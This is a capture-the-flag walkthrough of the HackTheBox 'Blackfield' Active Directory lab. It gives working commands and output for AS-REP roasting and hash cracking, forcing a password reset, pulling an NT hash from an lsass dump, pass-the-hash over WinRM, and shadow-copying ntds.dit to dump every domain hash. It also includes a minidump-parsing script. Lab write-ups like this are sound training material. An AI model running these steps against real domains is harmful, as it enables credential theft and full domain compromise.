# HTB — Blackfield

AD · Hard · Windows

ASREPRoasting yields a crackable hash for `support`. BloodHound shows `support` has ForceChangePassword over `audit2020`, which opens the forensic share. An lsass minidump on that share, parsed with pypykatz, gives the NT hash of `svc_backup`; its SeBackupPrivilege lets us snapshot the volume, copy ntds.dit and dump the Administrator hash offline.

January 23, 2025 · HackTheBox

#AD #ASREPRoasting #BloodHound #DCSync
## nmap

```sh
Nmap scan report for 10.10.10.192
Host is up (0.023s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-23 14:21:21Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m02s
| smb2-time:
| date: 2025-01-23T14:21:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 18.87 ms 10.10.14.1
2 18.92 ms 10.10.10.192
```

DNS, Kerberos, LDAP, SMB and RPC on a host named DC01: this is the domain controller for BLACKFIELD.local. Note the 8h clock skew. Kerberos rejects pre-authentication more than 5 minutes off the KDC's clock, so any step that needs a Kerberos logon or ticket must run with the clock synced to the DC (`ntpdate`/`faketime`). AS-REP roasting is unaffected, because the request it sends carries no pre-authentication timestamp.

## 445
Port 445 is open and the `guest` account (empty password) can list shares:

```sh
smbclient -L \\10.10.10.192 -U 'guest'
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
```

nxc shows which of them guest can actually read:

```sh
nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share
```

## profiles$

Guest has READ on `profiles$`. Every directory in it is named after a domain user, so the listing doubles as a list of valid usernames; the names go into `users.txt` for the next step.

```sh
smbclient \\\\10.10.10.192\\profiles$ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
AKoffenburger D 0 Wed Jun 3 12:47:11 2020
AKollolli D 0 Wed Jun 3 12:47:11 2020
AKruppe D 0 Wed Jun 3 12:47:11 2020
```

## asreproast
With the user list, ask the KDC for an AS-REP for each name without pre-authentication. Accounts with "Do not require Kerberos preauthentication" set hand back a blob encrypted with their password-derived key, which can be cracked offline. The run also confirms which names exist: a real account without the flag gets the "doesn't have UF_DONT_REQUIRE_PREAUTH set" message, while an unknown principal gets a KDC_ERR_C_PRINCIPAL_UNKNOWN error.

```sh
GetNPUsers.py BLACKFIELD.LOCAL/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:998138e7...$af9e789596efe72c4783479d772205b7c35b93dd0de967410d374f859a9a2343ee5d48d84c828248860c42b81fc2848322dbac618ffef61ea56f2ce2c026f9971cc46803bc7960ff405bab2b8484d272e860ebc9dd24782873359632dbe0c3cbd9b4d0ccaf7a0f51e1761765cae23d3e66616e3b610521f0f628d19ff019c75571e2a6b3acd4441c593807229cbd69249c16ae668d59a7b607bbcdb2421f96a4e373e7766f6269edc84423baa78df7225fa9a7e3ab9ffa76345524bc9f369f46c33ce185a61c2a267f6d2bfa0acb1ad45d3971dec27761548a710484bc84d5e6dba9af46091d90ffb765d18c109d92fd5b0af30e
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Only `support` is roastable. The `$krb5asrep$23$` prefix means etype 23 (RC4-HMAC), which is hashcat mode 18200:

```sh
hashcat -m 18200 support_asrep.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:998138e7...$af9e789596efe72c4783479d772205b7c35b93dd0de967410d374f859a9a2343ee5d48d84c828248860c42b81fc2848322dbac618ffef61ea56f2ce2c026f9971cc46803bc7960ff405bab2b8484d272e860ebc9dd24782873359632dbe0c3cbd9b4d0ccaf7a0f51e1761765cae23d3e66616e3b610521f0f628d19ff019c75571e2a6b3acd4441c593807229cbd69249c16ae668d59a7b607bbcdb2421f96a4e373e7766f6269edc84423baa78df7225fa9a7e3ab9ffa76345524bc9f369f46c33ce185a61c2a267f6d2bfa0acb1ad45d3971dec27761548a710484bc84d5e6dba9af46091d90ffb765d18c109d92fd5b0af30e:#00^BlackKnight
```

## creds

support:#00^BlackKnight
With a real domain account we can enumerate users over SAMR:

```sh
nxc smb 10.10.10.192 -u support -p '#00^BlackKnight' --users
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.192 445 DC01 Administrator 2020-02-23 18:09:53 0 Built-in account for administering the computer/domain
SMB 10.10.10.192 445 DC01 Guest 2020-06-03 16:18:28 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.192 445 DC01 krbtgt 2020-02-23 18:08:31 0 Key Distribution Center Service Account
SMB 10.10.10.192 445 DC01 audit2020 2020-09-21 22:35:06 0
SMB 10.10.10.192 445 DC01 support 2020-02-23 17:53:23 0
```

## bloodhound
```sh
bloodhound-python -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
zip -r blackfield.zip *.json
```

## ForceChangePassword

In BloodHound, `support` has the ForceChangePassword edge to `audit2020`: the right to reset that account's password without knowing the current one. Samba's `net rpc` does this over SAMR. It is a destructive, noisy change (the old password is gone and the DC logs the reset), so on a real engagement it needs sign-off first.

```sh
net rpc password "audit2020" "Password123" -U "blackfield"/"support"%"#00^BlackKnight" -S "10.10.10.192"
```
```sh
nxc smb 10.10.10.192 -u audit2020 -p 'Password123'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123
```

As `audit2020` the `forensic` share becomes readable:

```sh
nxc smb 10.10.10.192 -u audit2020 -p 'Password123' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
```

## forensic share
```sh
smbclient \\\\10.10.10.192\\forensic -U 'audit2020%Password123'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
```

## lsass.dmp
Among the files on the share is a minidump of lsass. Once downloaded, `file` confirms the format and pypykatz parses the credential packages out of it on Linux, no Windows or mimikatz needed:

```sh
ls
lsass.DMP
file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
pypykatz lsa minidump ./lsass.DMP
INFO:pypykatz:Parsing file ./lsass.DMP
FILE: ======== ./lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1...
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
```

WDigest caching is off, so there is no cleartext, but the MSV package gives the NT hash of `svc_backup`, which is enough for pass-the-hash.
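Before pypykatz can reach the MSV or WDIGEST packages it has to walk the minidump's header and stream directory and find the process memory. The parser below is an added example written for this page, not pypykatz's code: it handles the MINIDUMP_HEADER and MINIDUMP_DIRECTORY only, with the bounds checks a forensic parser needs on untrusted input, and reports whether the dump is usable for credential extraction at all (Task Manager's "Create dump file" produces a full-memory dump; a triage dump without memory streams is useless). The dump bytes it parses are constructed inline (four streams, not the 16-stream file on the share); the timestamp and type flags are set to the values `file` printed above, which is an assumption about that file, not something read from it.

```python
import struct
import time

MDMP_SIGNATURE = 0x504D444D  # b"MDMP" read as a little-endian uint32
# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
HEADER_FMT = "<IIIIIIQ"
# StreamType, DataSize, Rva
DIR_FMT = "<III"

STREAM_NAMES = {  # MINIDUMP_STREAM_TYPE values that matter for lsass work
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    6: "ExceptionStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
    15: "MiscInfoStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream",
}


def parse_minidump(blob: bytes) -> dict:
    """Parse header + stream directory; every RVA is checked against the file size."""
    if len(blob) < struct.calcsize(HEADER_FMT):
        raise ValueError("too short for a minidump header")
    sig, version, nstreams, dir_rva, _csum, ts, flags = struct.unpack_from(HEADER_FMT, blob, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("bad signature: not a minidump")
    entry = struct.calcsize(DIR_FMT)
    if dir_rva + nstreams * entry > len(blob):
        raise ValueError("stream directory runs past end of file")
    streams = []
    for n in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_FMT, blob, dir_rva + n * entry)
        if rva + size > len(blob):
            raise ValueError(f"stream {n} (type {stype}) points outside the file")
        streams.append({"type": stype, "size": size, "rva": rva,
                        "name": STREAM_NAMES.get(stype, f"Unknown({stype})")})
    # Low word of Version is the format version (0xA793); high word is implementation-defined.
    return {"version": version & 0xFFFF, "timestamp": ts, "flags": flags, "streams": streams}


def is_minidump(blob: bytes) -> bool:
    try:
        parse_minidump(blob)
        return True
    except ValueError:
        return False


def has_process_memory(info: dict) -> bool:
    """Credential extraction needs the memory itself (MemoryList or, for full
    dumps, Memory64List), SystemInfo to pick the lsasrv layout for that build,
    and ModuleList to locate lsasrv.dll's base address."""
    types = {s["type"] for s in info["streams"]}
    return (5 in types or 9 in types) and 7 in types and 4 in types


def build_sample(streams, timestamp: int, flags: int) -> bytes:
    """Constructed sample: header, directory, then one opaque payload per stream."""
    hdr_len = struct.calcsize(HEADER_FMT)
    dir_len = struct.calcsize(DIR_FMT) * len(streams)
    directory, payloads, rva = b"", b"", hdr_len + dir_len
    for stype, payload in streams:
        directory += struct.pack(DIR_FMT, stype, len(payload), rva)
        payloads += payload
        rva += len(payload)
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0xA793, len(streams),
                         hdr_len, 0, timestamp, flags)
    return header + directory + payloads


SAMPLE_TS = 1582480921    # constructed: 2020-02-23 18:02:01 UTC, the date `file` printed
SAMPLE_FLAGS = 0x421826   # constructed: the MINIDUMP_TYPE value `file` printed
SAMPLE_DUMP = build_sample(
    [(7, b"\x00" * 56), (4, b"\x00" * 4), (3, b"\x00" * 4), (9, b"\x00" * 16)],
    SAMPLE_TS, SAMPLE_FLAGS)
TRIAGE_DUMP = build_sample([(7, b"\x00" * 56), (4, b"\x00" * 4)], SAMPLE_TS, 0)

if __name__ == "__main__":
    info = parse_minidump(SAMPLE_DUMP)
    print(time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(info["timestamp"])),
          hex(info["flags"]), f"{len(info['streams'])} streams")
    for s in info["streams"]:
        print(f"  {s['name']:<22} size={s['size']:<6} rva=0x{s['rva']:x}")
    print("usable for credential extraction:", has_process_memory(info))
```

Run it and the sample prints the same three facts `file` reported (date, type flags, stream count) plus the directory; `has_process_memory` is the check to run before spending time on a dump that came out of an unknown tool.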
The NT hash is still valid (the note below says every password was changed, but evidently not this one), and `svc_backup` is in the WinRM allow-list:

```sh
nxc smb 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1...
nxc winrm 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1... (Pwn3d!)
```

## evil-winrm

```sh
evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'
```

## user.txt
```sh
*Evil-WinRM* PS C:\users\svc_backup\Desktop> cat user.txt
3920bb31...
```

## notes.txt
```sh
*Evil-WinRM* PS C:\> cat notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
```

## priv esc as svc_backup
```sh
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

`svc_backup` holds SeBackupPrivilege and SeRestorePrivilege, the Backup Operators rights. SeBackupPrivilege lets a process open any file for reading regardless of its ACL, which `robocopy /b` and `reg save` make use of. On a DC that means the whole directory database, but `ntds.dit` is held open by the NTDS service, so the copy has to come from a Volume Shadow Copy: create a snapshot of C: with diskshadow, expose it as a drive letter, and copy from there.

## test.dsh
diskshadow script (persistent snapshot, no VSS writers, exposed as Z:):

```sh
set context persistent nowriters
add volume c: alias test
create
expose %test% z:
```

If diskshadow complains about the script, convert it with `unix2dos` and make sure the last line ends with a newline. Upload and run it, then copy `ntds.dit` out of the snapshot in backup mode (`/b`) and save the SYSTEM hive, which holds the boot key needed to decrypt the database. SAM is not needed for ntds.dit but gives the local account hashes as a bonus.

```sh
*Evil-WinRM* PS C:\users\svc_backup> upload /home/sake/htb-labs/Blackfield/test.dsh
```

```sh
*Evil-WinRM* PS C:\users\svc_backup> diskshadow /s test.dsh
```

```sh
*Evil-WinRM* PS C:\users\svc_backup> robocopy /b z:\windows\ntds . ntds.dit
```

```sh
*Evil-WinRM* PS C:\> mkdir temp
```

```sh
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\temp> reg save HKLM\SAM SAM.SAV
```

```sh
*Evil-WinRM* PS C:\temp> download SAM.SAV
*Evil-WinRM* PS C:\temp> download SYSTEM.SAV
*Evil-WinRM* PS C:\users\svc_backup> download ntds.dit
```

Once the files are off the box, remove the snapshot (`delete shadows all` in diskshadow) and the copies in C:\temp so nothing is left behind.
Offline, secretsdump only needs the SYSTEM hive (for the boot key that unlocks the PEK) and the database; `LOCAL` tells it to parse files rather than connect anywhere, so no credentials or `-hashes` are involved:

```sh
secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3f...
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435...:184fb5e5...:::
Guest:501:aad3b435...:31d6cfe0...:::
DC01$:1000:aad3b435...:62470ed8...:::
krbtgt:502:aad3b435...:d3c02561...:::
audit2020:1103:aad3b435...:600a406c...:::
support:1104:aad3b435...:cead107b...:::
```

## winrm as administrator
Pass the Administrator NT hash from the dump to evil-winrm with `-H`, exactly as for `svc_backup`, and read the flag:

```sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629...
```